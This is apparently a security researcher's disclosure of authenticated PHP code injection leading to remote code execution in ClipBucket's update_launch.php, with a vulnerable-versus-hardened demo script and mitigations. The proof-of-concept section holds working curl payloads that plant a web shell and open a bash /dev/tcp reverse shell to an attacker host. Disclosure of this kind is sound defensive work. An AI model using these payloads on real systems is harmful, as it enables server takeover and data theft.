TL;DR
An authenticated administrator can inject arbitrary PHP code via the type parameter in update_launch.php, leading to Remote Code Execution (RCE).
This can be used to deploy a web shell and gain full system access.
Overview
While analyzing ClipBucket, I discovered an authenticated Remote Code Execution (RCE) vulnerability in the update mechanism.
The application dynamically generates a PHP script using user-controlled input and executes it via the PHP CLI. Due to improper sanitization, attackers can inject arbitrary PHP code into this generated script.
Vulnerable Code
The core issue lies in how user input is embedded into dynamically generated PHP code:
```php
$data = '<?php
if (php_sapi_name() != \'cli\') { die; }
...
$type = \'' . $_POST['type'] . '\'; // VULNERABLE
...
?>';
fwrite($tmp_file, $data);
fclose($tmp_file);
// The generated file is executed via shell_exec using the PHP CLI.
$cmd = System::get_binaries('php') . ' -q ' . DirPath::get('temp') . 'update_core_tmp.php';
shell_exec($cmd);
```

Key Observations
- User input ($_POST['type']) is concatenated directly into the generated script
- No escaping or sanitization is applied
- The generated PHP file is executed via shell_exec()
Root Cause
The root cause is improper control of dynamically generated code (CWE-94).
Data flow:
User input → PHP string concatenation → file write → PHP CLI execution
Because the input is embedded inside a single-quoted PHP string:
```php
$type = '<USER_INPUT>';
```
an attacker can close the string with a single quote, append arbitrary PHP statements, and comment out the quote and semicolon that the template appends after the value.
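To make the break-out concrete, the following stand-alone script is an added example (not ClipBucket's code) that reproduces the generator pattern with a function argument standing in for $_POST['type'], executes the generated file through the PHP CLI the same way update_launch.php does, and places a hardened generator beside it using the allowlist approach recommended under Secure Approach. The template body, the INJECTED marker, the allowed-type list and the temporary file handling are constructed for the demo.

```php
<?php
// Added example, not ClipBucket's code. A function argument replaces
// $_POST['type'] so the script runs from the command line:
//   php codegen_demo.php        (file name assumed)
declare(strict_types=1);

// Vulnerable generator: the value is dropped into a single-quoted PHP string,
// exactly the pattern in the update_launch.php snippet.
function build_update_script_vulnerable(string $type): string
{
    return "<?php\n"
        . "if (php_sapi_name() != 'cli') { die; }\n"
        . '$type = \'' . $type . "';\n"
        . 'echo "update type: ", $type, "\n";' . "\n";
}

// Hardened generator: strict allowlist first (is_string plus in_array(..., true),
// so an array or a loosely-equal value cannot slip through), then var_export()
// to emit a correctly quoted PHP string literal instead of hand-built quoting.
function build_update_script_hardened($type): string
{
    $allowed = ['core', 'plugin'];   // constructed list for the demo
    if (!is_string($type) || !in_array($type, $allowed, true)) {
        throw new InvalidArgumentException('Invalid update type');
    }
    return "<?php\n"
        . "if (php_sapi_name() != 'cli') { die; }\n"
        . '$type = ' . var_export($type, true) . ";\n"
        . 'echo "update type: ", $type, "\n";' . "\n";
}

// Write the generated script to a temp file and run it with the PHP CLI,
// mirroring the fwrite() + shell_exec() step. The path is escaped for the
// shell; the original builds its command by plain concatenation.
function run_generated(string $script): string
{
    $path = tempnam(sys_get_temp_dir(), 'upd_');
    file_put_contents($path, $script);
    $out = shell_exec(escapeshellarg(PHP_BINARY) . ' -q ' . escapeshellarg($path));
    unlink($path);
    return (string) $out;
}

// Constructed payload with the same shape as the PoC: close the string, run a
// statement of our own, then comment out the template's trailing quote.
$payload = "core'; echo 'INJECTED', PHP_EOL; //";

echo "== vulnerable, benign input ==\n", run_generated(build_update_script_vulnerable('core'));
echo "== vulnerable, payload ==\n",      run_generated(build_update_script_vulnerable($payload));
echo "== hardened, benign input ==\n",   run_generated(build_update_script_hardened('core'));
echo "== hardened, payload ==\n";
try {
    run_generated(build_update_script_hardened($payload));
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";   // rejected before anything is written or executed
}
```

Run it with any PHP 7.4 or newer CLI. The generated file for the payload contains the attacker's echo as a separate statement ahead of the template's own echo, which is the whole vulnerability in one line; the hardened variant refuses the value before a file is written. var_export() is used rather than manual escaping so that any future change to the allowlist still produces a valid literal, and escapeshellarg() on the temp path is defence in depth for the command string, not a fix for the injection itself.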
Proof of Concept
Stage 1: Web Shell Deployment (Persistence)
Crafted request:
```bash
curl -X POST "http://[TARGET]/admin_area/actions/update_launch.php" \
  -H "Cookie: PHPSESSID=[ADMIN_SESSION_ID]" \
  -d "type=core'; file_put_contents(dirname(__DIR__, 2).'/vuln.php', '<?php system(\$_GET[\"cmd\"]); ?>'); //"
```
The leading core' closes the single-quoted string in the generated script, the trailing // comments out the quote and semicolon the template appends, and dirname(__DIR__, 2) is resolved from the location of the generated temp script. The \$ and \" are shell escapes only; the server receives $_GET["cmd"] unchanged.
Result
A web shell is created at:
```
/vuln.php
```
Verification:
```bash
curl -s "http://[TARGET]/vuln.php?cmd=id"
```
Expected output:
```
uid=1000(containeruser) gid=1000(containeruser)
```
Stage 2: Reverse Shell (Full System Control)
Listener:
```bash
nc -lvnp 4444
```
Trigger:
```bash
curl -G "http://[TARGET]/vuln.php" \
  --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/4444 0>&1'"
```
Result:
- Reverse shell established
- Full interactive access as containeruser
Impact
Successful exploitation leads to full system compromise:
Direct Impact
- Arbitrary command execution
- Web shell deployment
- Persistent access
Extended Impact
- Full Data Access: read sensitive files (e.g., config.inc.php, database credentials)
- System Integrity Compromise: modify or delete application files
- Lateral Movement: use the compromised host as a pivot point
Attack Conditions
- Authentication required (Admin)
- Valid session (PHPSESSID)
- Access to the admin panel endpoint
Patch Analysis
The vulnerability stems from unsafe string concatenation in code generation.
Secure Approach
- Avoid dynamic code generation using user input
- Escape or strictly validate inputs
- Use allowlists for expected values
Example mitigation:
```php
// Strip everything outside [A-Za-z0-9_] so the value can no longer close the quoted string
$type = preg_replace('/[^a-zA-Z0-9_]/', '', $_POST['type']);
```
Or ideally:
```php
// Reject anything that is not a known update type; the third argument forces strict (===) comparison
$allowed = ['core', 'plugin'];
if (!in_array($_POST['type'], $allowed, true)) {
    die('Invalid type');
}
```
Why This Matters
This vulnerability is particularly dangerous because:
- It combines code injection + execution
- Exploitation is straightforward once authenticated
- It results in immediate RCE without chaining
Additionally:
- The bug exists in an update mechanism
- Such features are often trusted and overlooked
- High-privilege context increases impact significantly
Key Insight
When user input is used to generate executable code:
It is no longer just input validation — it becomes code execution control
Conclusion
This vulnerability demonstrates how unsafe dynamic code generation can lead to critical security issues.
Although authentication is required, the impact is severe due to:
- Direct RCE capability
- High privilege execution context
- Ease of exploitation
Contribution
- Identified PHP code injection vector
- Developed working RCE PoC
- Demonstrated web shell + reverse shell
- Verified vulnerability on latest version
- Analyzed incomplete prior patch
Author
drkim
- GitHub: https://github.com/drkim-dev
- Team: https://redpoc.github.io/